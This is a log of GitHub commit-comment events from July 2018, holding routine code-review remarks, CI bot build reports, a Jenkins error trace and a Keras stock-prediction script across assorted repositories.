{"id":"8033448749","type":"CommitCommentEvent","actor":{"login":"hi-im-evab"},"repo":{"name":"hi-im-evab/beepboop"},"payload":{"comment":{"id":29872731,"position":null,"line":null,"path":null,"commit_id":"c3949961a84880b063d2eedc7fbb1d5a105443c9","created_at":"2018-07-29T06:03:55Z","updated_at":"2018-07-29T06:03:55Z","author_association":"OWNER","body":"wat"}},"created_at":"2018-07-29T06:03:55Z"}
{"id":"8033451105","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29872742,"position":null,"line":null,"path":null,"commit_id":"74cb52ff68482149247dbc3eb995f8b31130a0e3","created_at":"2018-07-29T06:06:21Z","updated_at":"2018-07-29T06:06:21Z","author_association":"OWNER","body":"@locutus2 Great idea!  Just to clarify, why not consider whether the pawn can capture at all?  I'm not sure what you mean by \"volatile\" in this context.  Perhaps the static eval won't be important in that position because search will handle the capture?"}},"created_at":"2018-07-29T06:06:21Z"}
{"id":"8033453393","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29872743,"position":29,"line":29,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T06:08:45Z","updated_at":"2018-07-29T06:08:45Z","author_association":"MEMBER","body":"As packer is a Go program instead of a C/C++ one, I assume there's no need to introduce compiler selection statements. The reason for build failures on < 10.8 is that the current go port (version 1.10) does not support such old platforms. This port can't use go-1.4 either as [it requires go 1.7 or newer](https://github.com/hashicorp/packer/blob/master/.github/CONTRIBUTING.md#setting-up-go-to-work-on-packer)."}},"created_at":"2018-07-29T06:08:45Z"}
{"id":"8033454950","type":"CommitCommentEvent","actor":{"login":"tsendil"},"repo":{"name":"tsendil/SQL-Exercise"},"payload":{"comment":{"id":29872744,"position":null,"line":null,"path":null,"commit_id":"0974ac671235a4321c14397d391db80f20eae7d8","created_at":"2018-07-29T06:10:20Z","updated_at":"2018-07-29T06:10:20Z","author_association":"OWNER","body":"**SQL Exercise**\r\n\r\n- ddl contains scripts to create  tables\r\n- other  files each have insert scripts to load data into tables created\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-29T06:10:20Z"}
{"id":"8033455023","type":"CommitCommentEvent","actor":{"login":"tsendil"},"repo":{"name":"tsendil/SQL-Exercise"},"payload":{"comment":{"id":29872745,"position":null,"line":null,"path":null,"commit_id":"0974ac671235a4321c14397d391db80f20eae7d8","created_at":"2018-07-29T06:10:25Z","updated_at":"2018-07-29T06:10:25Z","author_association":"OWNER","body":"chnaged"}},"created_at":"2018-07-29T06:10:25Z"}
{"id":"8033455679","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29872746,"position":29,"line":29,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T06:11:05Z","updated_at":"2018-07-29T06:11:05Z","author_association":"MEMBER","body":"Regarding \"silent rules\" - upstream adds `@` to almost all commands in the hand-written Makefile. IMO it's not practical to patch them out."}},"created_at":"2018-07-29T06:11:05Z"}
{"id":"8033456447","type":"CommitCommentEvent","actor":{"login":"cloudwu"},"repo":{"name":"cloudwu/skynet"},"payload":{"comment":{"id":29872750,"position":null,"line":null,"path":null,"commit_id":"d4b5e8f62f30dd883dca6cdaabf4607998f21ef0","created_at":"2018-07-29T06:11:56Z","updated_at":"2018-07-29T06:11:56Z","author_association":"OWNER","body":"You can submit a pull request."}},"created_at":"2018-07-29T06:11:56Z"}
{"id":"8033456666","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29872751,"position":null,"line":null,"path":null,"commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T06:12:09Z","updated_at":"2018-07-29T06:12:09Z","author_association":"MEMBER","body":"@newtonne Could you open a new pull request to address the two issues mentioned by @ryandesign above?"}},"created_at":"2018-07-29T06:12:09Z"}
{"id":"8033456897","type":"CommitCommentEvent","actor":{"login":"shattenjager"},"repo":{"name":"shattenjager/content-jenkins-java-project"},"payload":{"comment":{"id":29872754,"position":null,"line":null,"path":null,"commit_id":"846ae3783c5830c2b6cd8a2c0aa1d5654913edc3","created_at":"2018-07-29T06:12:21Z","updated_at":"2018-07-29T06:12:21Z","author_association":"OWNER","body":"I get an error on ``def myLib = new linuxacademy.git.gitStuff();`` from Jenkins console output.\r\nthis is the log:\r\n\r\nStarted by user Thomas Pavan\r\nObtained Jenkinsfile from git git@github.com:shattenjager/content-jenkins-java-project.git\r\nRunning in Durability level: MAX_SURVIVABILITY\r\norg.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed:\r\nWorkflowScript: 23: unable to resolve class linuxacademy.git.gitStuff \r\n @ line 23, column 23.\r\n             def myLib = new linuxacademy.git.gitStuff();\r\n                         ^\r\n\r\n1 error\r\n\r\n\tat org.codehaus.groovy.control.ErrorCollector.failIfErrors(ErrorCollector.java:310)\r\n\tat org.codehaus.groovy.control.CompilationUnit.applyToSourceUnits(CompilationUnit.java:958)\r\n\tat org.codehaus.groovy.control.CompilationUnit.doPhaseOperation(CompilationUnit.java:605)\r\n\tat org.codehaus.groovy.control.CompilationUnit.compile(CompilationUnit.java:554)\r\n\tat groovy.lang.GroovyClassLoader.doParseClass(GroovyClassLoader.java:298)\r\n\tat groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:268)\r\n\tat groovy.lang.GroovyShell.parseClass(GroovyShell.java:688)\r\n\tat groovy.lang.GroovyShell.parse(GroovyShell.java:700)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsGroovyShell.doParse(CpsGroovyShell.java:131)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsGroovyShell.reparse(CpsGroovyShell.java:125)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsFlowExecution.parseScript(CpsFlowExecution.java:560)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsFlowExecution.start(CpsFlowExecution.java:521)\r\n\tat org.jenkinsci.plugins.workflow.job.WorkflowRun.run(WorkflowRun.java:330)\r\n\tat hudson.model.ResourceController.execute(ResourceController.java:97)\r\n\tat hudson.model.Executor.run(Executor.java:429)\r\nFinished: FAILURE"}},"created_at":"2018-07-29T06:12:21Z"}
{"id":"8033457932","type":"CommitCommentEvent","actor":{"login":"shattenjager"},"repo":{"name":"linuxacademy/content-jenkins-java-project"},"payload":{"comment":{"id":29872759,"position":null,"line":null,"path":null,"commit_id":"846ae3783c5830c2b6cd8a2c0aa1d5654913edc3","created_at":"2018-07-29T06:13:24Z","updated_at":"2018-07-29T06:13:24Z","author_association":"NONE","body":"I get an error on ``def myLib = new linuxacademy.git.gitStuff();`` from Jenkins console output.\r\nthis is the log:\r\n\r\nStarted by user Thomas Pavan\r\nObtained Jenkinsfile from git git@github.com:shattenjager/content-jenkins-java-project.git\r\nRunning in Durability level: MAX_SURVIVABILITY\r\norg.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed:\r\nWorkflowScript: 23: unable to resolve class linuxacademy.git.gitStuff \r\n @ line 23, column 23.\r\n             def myLib = new linuxacademy.git.gitStuff();\r\n                         ^\r\n\r\n1 error\r\n\r\n\tat org.codehaus.groovy.control.ErrorCollector.failIfErrors(ErrorCollector.java:310)\r\n\tat org.codehaus.groovy.control.CompilationUnit.applyToSourceUnits(CompilationUnit.java:958)\r\n\tat org.codehaus.groovy.control.CompilationUnit.doPhaseOperation(CompilationUnit.java:605)\r\n\tat org.codehaus.groovy.control.CompilationUnit.compile(CompilationUnit.java:554)\r\n\tat groovy.lang.GroovyClassLoader.doParseClass(GroovyClassLoader.java:298)\r\n\tat groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:268)\r\n\tat groovy.lang.GroovyShell.parseClass(GroovyShell.java:688)\r\n\tat groovy.lang.GroovyShell.parse(GroovyShell.java:700)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsGroovyShell.doParse(CpsGroovyShell.java:131)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsGroovyShell.reparse(CpsGroovyShell.java:125)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsFlowExecution.parseScript(CpsFlowExecution.java:560)\r\n\tat org.jenkinsci.plugins.workflow.cps.CpsFlowExecution.start(CpsFlowExecution.java:521)\r\n\tat org.jenkinsci.plugins.workflow.job.WorkflowRun.run(WorkflowRun.java:330)\r\n\tat hudson.model.ResourceController.execute(ResourceController.java:97)\r\n\tat hudson.model.Executor.run(Executor.java:429)\r\nFinished: FAILURE"}},"created_at":"2018-07-29T06:13:24Z"}
{"id":"8033460396","type":"CommitCommentEvent","actor":{"login":"Y-Jumpei"},"repo":{"name":"Y-Jumpei/TestRepository"},"payload":{"comment":{"id":29872764,"position":null,"line":null,"path":null,"commit_id":"328d4db9c70c84a0f3e5c40c50b027d7fee39245","created_at":"2018-07-29T06:15:50Z","updated_at":"2018-07-29T06:15:50Z","author_association":"OWNER","body":"コメント"}},"created_at":"2018-07-29T06:15:50Z"}
{"id":"8033460548","type":"CommitCommentEvent","actor":{"login":"Vwan"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29872765,"position":21,"line":72,"path":"ch2/2.2HierarchicalDataandtheClosureProperty.md","commit_id":"6d1f9a8e5d23f16cf22fd0f8a74e482db6155d60","created_at":"2018-07-29T06:15:59Z","updated_at":"2018-07-29T06:15:59Z","author_association":"OWNER","body":"@NBR-hugh 是的，这是我目前的感觉，有一种思想（比如递归）贯穿了lisp，用它可以实现所有。而python等似乎没有这种感觉。不知道理解的对不对哈，以后继续观察"}},"created_at":"2018-07-29T06:15:59Z"}
{"id":"8033461840","type":"CommitCommentEvent","actor":{"login":"goranmrd"},"repo":{"name":"goranmrd/cleverprogrammer_blog"},"payload":{"comment":{"id":29872770,"position":1,"line":1,"path":"blog/models.py","commit_id":"4c244de2bf6b09217f7bd1af58265ec6edbd3716","created_at":"2018-07-29T06:17:17Z","updated_at":"2018-07-29T06:17:17Z","author_association":"OWNER","body":"Don't paste this line. It is updated in next step."}},"created_at":"2018-07-29T06:17:17Z"}
{"id":"8033475515","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29872843,"position":null,"line":null,"path":null,"commit_id":"215de7d9af65be30f989addb65cbb8433c709f4a","created_at":"2018-07-29T06:31:15Z","updated_at":"2018-07-29T06:31:15Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 730](https://travis-ci.org/per1234/arduino-ci-script/builds/409454773) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00730-001-tsv"}},"created_at":"2018-07-29T06:31:15Z"}
{"id":"8033475655","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29872844,"position":null,"line":null,"path":null,"commit_id":"215de7d9af65be30f989addb65cbb8433c709f4a","created_at":"2018-07-29T06:31:22Z","updated_at":"2018-07-29T06:31:22Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 730](https://travis-ci.org/per1234/arduino-ci-script/builds/409454773) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00730"}},"created_at":"2018-07-29T06:31:22Z"}
{"id":"8033475743","type":"CommitCommentEvent","actor":{"login":"JeffBezanson"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29872845,"position":29,"line":1861,"path":"src/dump.c","commit_id":"2837c244e62b6590b020f999bdd8d16d44a8d9b2","created_at":"2018-07-29T06:31:27Z","updated_at":"2018-07-29T06:31:27Z","author_association":"MEMBER","body":"I figured there was a reason for this, but it seems pretty hard to construct an example. I'll just do the simpler fix for now though."}},"created_at":"2018-07-29T06:31:27Z"}
{"id":"8033476928","type":"CommitCommentEvent","actor":{"login":"hokx"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29872847,"position":1,"line":25,"path":"app/src/lib/stores/pull-request-store.ts","commit_id":"fba68153452f03d085ffcb55ecc7b701e24789af","created_at":"2018-07-29T06:32:33Z","updated_at":"2018-07-29T06:32:33Z","author_association":"NONE","body":"Api"}},"created_at":"2018-07-29T06:32:33Z"}
{"id":"8033477424","type":"CommitCommentEvent","actor":{"login":"mehrabbp"},"repo":{"name":"mehrabbp/DS-Spring97"},"payload":{"comment":{"id":29872853,"position":3,"line":3,"path":"proj1","commit_id":"448df1cb060ff651ac0e888f4aea2f768c79fdbf","created_at":"2018-07-29T06:33:01Z","updated_at":"2018-07-29T06:33:01Z","author_association":"OWNER","body":"initializing\r\n"}},"created_at":"2018-07-29T06:33:01Z"}
{"id":"8033477664","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29872854,"position":null,"line":null,"path":null,"commit_id":"56971ba38b27429d15bb6461ac2aa82c9b6ef71a","created_at":"2018-07-29T06:33:15Z","updated_at":"2018-07-29T06:33:15Z","author_association":"NONE","body":"お疲れ様です。機能をほぼ満たしていて、割と読みやすいコードですね。\r\nctoっていう変数名いい感じだと思います。注釈も書いてありますし。\r\n\r\nオプションが正しく選択されたなかった場合エラー表示していないのがちょっと惜しい気もしますが、再入力はされるので、大きな問題ではないと思います。\r\n\r\nあと、ちょっと細かいですが、49行目は\r\nprint(\"注文内容は\", order_list, \"です\")\r\nがいいと思います。第1引数の直後のスペースとカンマのどっちが先か、ですね。通常はカンマを先にします。"}},"created_at":"2018-07-29T06:33:15Z"}
{"id":"8033477771","type":"CommitCommentEvent","actor":{"login":"ziming"},"repo":{"name":"tightenco/parental"},"payload":{"comment":{"id":29872855,"position":null,"line":null,"path":null,"commit_id":"a42bc7d083731682676dd037f13154105cef07bf","created_at":"2018-07-29T06:33:21Z","updated_at":"2018-07-29T06:33:21Z","author_association":"NONE","body":"Is there a new release for this change?"}},"created_at":"2018-07-29T06:33:21Z"}
{"id":"8033479434","type":"CommitCommentEvent","actor":{"login":"TanviKumar"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29872860,"position":34,"line":818,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-29T06:34:58Z","updated_at":"2018-07-29T06:34:58Z","author_association":"MEMBER","body":"The initial idea was to allow user to get the hex string by using value () and get a p5.Color object using color(). I'm getting a colorMode based error when I try to create a p5.Color object inside this method. "}},"created_at":"2018-07-29T06:34:58Z"}
{"id":"8033481430","type":"CommitCommentEvent","actor":{"login":"haesleinhuepf"},"repo":{"name":"ClearControl/clearcontrol-lightsheet"},"payload":{"comment":{"id":29872881,"position":34,"line":38,"path":"src/clearcontrol/microscope/lightsheet/spatialphasemodulation/instructions/RandomZernikesInstruction.java","commit_id":"5a27cfe674eaa37b58b9936493ddac22a040734d","created_at":"2018-07-29T06:36:59Z","updated_at":"2018-07-29T06:36:59Z","author_association":"MEMBER","body":"Hey @debayansaha102 ,\r\n\r\ncould you please simplify that line?\r\n\r\nThanks!\r\nRobert\r\n"}},"created_at":"2018-07-29T06:36:59Z"}
{"id":"8033481440","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29872882,"position":2,"line":2,"path":"2/fifth.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T06:37:00Z","updated_at":"2018-07-29T06:37:00Z","author_association":"NONE","body":"После запятой в массиве ставится пробел"}},"created_at":"2018-07-29T06:37:00Z"}
{"id":"8033482931","type":"CommitCommentEvent","actor":{"login":"fancy-rabbit"},"repo":{"name":"Axlgrep/blackwidow"},"payload":{"comment":{"id":29872895,"position":null,"line":null,"path":null,"commit_id":"f19970d480384a6b618d6d768c5fad7349cbf94e","created_at":"2018-07-29T06:38:30Z","updated_at":"2018-07-29T06:38:30Z","author_association":"NONE","body":"should return Status::NotFound() in ZScan\r\nif (parsed_zsets_meta_value.IsStale() || parsed_zsets_meta_value.count() == 0)"}},"created_at":"2018-07-29T06:38:30Z"}
{"id":"8033484386","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29872903,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-29T06:40:02Z","updated_at":"2018-07-29T06:40:02Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2315 of 2315 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-29T06:40:02Z"}
{"id":"8033484553","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29872905,"position":null,"line":null,"path":null,"commit_id":"3aef06799ac623fa9ec5cf05f20badf1b34cf91a","created_at":"2018-07-29T06:40:11Z","updated_at":"2018-07-29T06:40:11Z","author_association":"NONE","body":"提出お疲れ様でした。\r\n機能的にはほぼ出来てるけど、ちょっと惜しい点が。\r\n\r\nオプションを選択せずに抜けた時の合計金額が、リストのまま[500]といった具合に表示されているのが気になりますね。(オプションを1つ以上選択するとこれが表示されない。)\r\n表示が統一出来ていたら尚よかったです。"}},"created_at":"2018-07-29T06:40:11Z"}
{"id":"8033484857","type":"CommitCommentEvent","actor":{"login":"kaivalyar"},"repo":{"name":"kaivalyar/pracmln"},"payload":{"comment":{"id":29872906,"position":null,"line":null,"path":null,"commit_id":"6702126e3ad141c461e172e96df21b341a49fdfa","created_at":"2018-07-29T06:40:25Z","updated_at":"2018-07-29T06:40:25Z","author_association":"OWNER","body":"These changes are merged from the evidence branch"}},"created_at":"2018-07-29T06:40:25Z"}
{"id":"8033485981","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29872910,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-29T06:41:27Z","updated_at":"2018-07-29T06:41:27Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-29T06:41:27Z"}
{"id":"8033487273","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29872914,"position":null,"line":null,"path":null,"commit_id":"275804ae36f4dc4a01f624f1ae33d6b9ec3ed57a","created_at":"2018-07-29T06:42:37Z","updated_at":"2018-07-29T06:42:37Z","author_association":"NONE","body":"お疲れ様です。\r\nメインメニューの選択は出来たようですね。参考までに他の人がどのように解いたかを見てみてくださいね。\r\n火曜日までには僕のサンプルもpushしますので。"}},"created_at":"2018-07-29T06:42:37Z"}
{"id":"8033488178","type":"CommitCommentEvent","actor":{"login":"Jimmi08"},"repo":{"name":"e107inc/e107"},"payload":{"comment":{"id":29872921,"position":null,"line":null,"path":null,"commit_id":"e5af746153a8d9fbdaeca87c8f89115959f929e6","created_at":"2018-07-29T06:43:36Z","updated_at":"2018-07-29T06:43:36Z","author_association":"CONTRIBUTOR","body":"@arunshekher Great work.  Only note:  Rich Text Editor - this was confusing label for me.   If I get this right, maybe label \"The same as post\" or \"Post editor\" would be better. \r\n"}},"created_at":"2018-07-29T06:43:36Z"}
{"id":"8033489541","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29872928,"position":18,"line":18,"path":"2/fifth.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T06:45:06Z","updated_at":"2018-07-29T06:45:06Z","author_association":"NONE","body":"Повторюсь: Настрой редактор на отступ ровно в 2 пробела, именно так принято в ruby. Причем, именно пробела, а не таба. Т.е. должна быть замена табов на пробелы, т.н. soft tabs. Найди в интернете как сделать soft tabs для твоего редактора"}},"created_at":"2018-07-29T06:45:06Z"}
{"id":"8033490489","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29872931,"position":18,"line":18,"path":"2/fifth.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T06:46:04Z","updated_at":"2018-07-29T06:46:04Z","author_association":"NONE","body":"Ну и пока тут не все работает\r\n```\r\n:2$ ruby fifth.rb\r\nдень: 1\r\nмесяц: 1\r\nгод: 1\r\nfifth.rb:11:in `<main>': undefined method `+' for nil:NilClass (NoMethodError)\r\n```"}},"created_at":"2018-07-29T06:46:04Z"}
{"id":"8033491488","type":"CommitCommentEvent","actor":{"login":"jihad55"},"repo":{"name":"jihad55/rnn-code"},"payload":{"comment":{"id":29872935,"position":43,"line":43,"path":"README.md","commit_id":"bfb061aa5ed233b22637f885fa46e01bf7cdff7b","created_at":"2018-07-29T06:47:02Z","updated_at":"2018-07-29T06:47:02Z","author_association":"OWNER","body":"\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the training set\r\ntraining_set = pd.read_csv('Google_Stock_Price_Train.csv')\r\ntraining_set = training_set.iloc[:, 1:2].values\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nsc = MinMaxScaler()\r\ntraining_set = sc.fit_transform(training_set)\r\n\r\n#get input and output\r\nX_train = training_set[0:1257]\r\ny_train = training_set[1:1258]\r\n\r\n#reshaping\r\nX_train = np.reshape(X_train, (1257,1, 1))\r\n\r\n# Importing the Keras libraries and packages\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import LSTM\r\n\r\n# Initialising the RNN\r\nregressor = Sequential()\r\n#add lstm layer\r\nregressor.add(LSTM(units = 4, activation = 'sigmoid', input_shape = (None, 1)))\r\n\r\n#add output layer\r\nregressor.add(Dense(units = 1))\r\n\r\n#compiling\r\nregressor.compile(optimizer = 'adam', loss = 'mean_squared_error')\r\n\r\n#fitting rnn to training set\r\nregressor.fit(X_train, y_train, batch_size = 32, epochs= 200)\r\n\r\n#get the real price 2017\r\ntest_set = pd.read_csv('Google_Stock_Price_Test.csv')\r\nreal_stock_price = test_set.iloc[:, 1:2].values\r\n\r\n#getting prediction\r\ninputs = real_stock_price\r\ninputs = sc.transform(inputs)\r\ninputs = np.reshape(inputs, (20,1, 1))\r\npredicted_stock_price = regressor.predict(inputs)\r\npredicted_stock_price = sc.inverse_transform(predicted_stock_price)\r\n\r\n#visulaising stock price\r\nplt.plot(real_stock_price, color = 'red', label = 'Real Google Stock Price')\r\nplt.plot(predicted_stock_price, color = 'blue', label = 'predicted Google Stock Price')\r\nplt.title('Google Stock Price Prediction')\r\nplt.xlabel('Time')\r\nplt.ylabel('Google Stock Price')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#homework\r\nreal_stock_price_train = pd.read_csv('Google_Stock_Price_Train.csv')\r\nreal_stock_price_train = real_stock_price_train.iloc[:, 1:2].values\r\n\r\npredicted_stock_price_train = regressor.predict(X_train)\r\npredicted_stock_price_train = sc.inverse_transform(predicted_stock_price_train)\r\n\r\n#visulaising stock price\r\nplt.plot(real_stock_price_train, color = 'red', label = 'Real Google Stock Price')\r\nplt.plot(predicted_stock_price_train, color = 'blue', label = 'predicted Google Stock Price')\r\nplt.title('Google Stock Price Prediction')\r\nplt.xlabel('Time')\r\nplt.ylabel('Google Stock Price')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#evaluating\r\nimport math\r\nfrom sklearn.metrics import mean_squared_error\r\nrmse = math.sqrt(mean_squared_error(real_stock_price, predicted_stock_price))"}},"created_at":"2018-07-29T06:47:02Z"}
{"id":"8033492002","type":"CommitCommentEvent","actor":{"login":"Arvindgupta88"},"repo":{"name":"Arvindgupta88/hello-world"},"payload":{"comment":{"id":29872939,"position":null,"line":null,"path":null,"commit_id":"5272b8c8d7ec7695810f2ade5c764cb7ff08eb76","created_at":"2018-07-29T06:47:32Z","updated_at":"2018-07-29T06:47:32Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-29T06:47:32Z"}
{"id":"8033492570","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29872947,"position":15,"line":15,"path":"2/first.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T06:48:08Z","updated_at":"2018-07-29T06:48:08Z","author_association":"NONE","body":"Лучше не использовать общие имена как key, value, а давать переменным и методам осмысленные имена month and days подойдут гораздо больше"}},"created_at":"2018-07-29T06:48:08Z"}
{"id":"8033493922","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29872954,"position":null,"line":null,"path":null,"commit_id":"2791293af7471620e180b1eb59da54a15c703cb3","created_at":"2018-07-29T06:49:27Z","updated_at":"2018-07-29T06:49:27Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 731](https://travis-ci.org/per1234/arduino-ci-script/builds/409456590) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00731-001-tsv"}},"created_at":"2018-07-29T06:49:27Z"}
{"id":"8033494011","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29872955,"position":null,"line":null,"path":null,"commit_id":"2791293af7471620e180b1eb59da54a15c703cb3","created_at":"2018-07-29T06:49:33Z","updated_at":"2018-07-29T06:49:33Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 731](https://travis-ci.org/per1234/arduino-ci-script/builds/409456590) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00731"}},"created_at":"2018-07-29T06:49:33Z"}
{"id":"8033494243","type":"CommitCommentEvent","actor":{"login":"hokx"},"repo":{"name":"vertexclique/tokamak"},"payload":{"comment":{"id":29872956,"position":1,"line":1,"path":".gitignore","commit_id":"1a1fc4c476135701c54afa657831d5cbc87a97cb","created_at":"2018-07-29T06:49:45Z","updated_at":"2018-07-29T06:49:45Z","author_association":"NONE","body":"Debug log\r\n"}},"created_at":"2018-07-29T06:49:45Z"}
{"id":"8033495736","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29872957,"position":null,"line":null,"path":null,"commit_id":"b9c778f02d8ffbfb7abdf94cde2d8cda648517a5","created_at":"2018-07-29T06:51:15Z","updated_at":"2018-07-29T06:51:15Z","author_association":"OWNER","body":"Following #43 "}},"created_at":"2018-07-29T06:51:15Z"}
{"id":"8033497744","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29872966,"position":6,"line":6,"path":"2/fourth.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T06:53:14Z","updated_at":"2018-07-29T06:53:14Z","author_association":"NONE","body":"Тут не из названия, не из имплементации не понятно, что этот код должен был делать. Если это задача по порядковому номеру гласных, то гласные тут не упомянуты. То есть задача не решена"}},"created_at":"2018-07-29T06:53:14Z"}
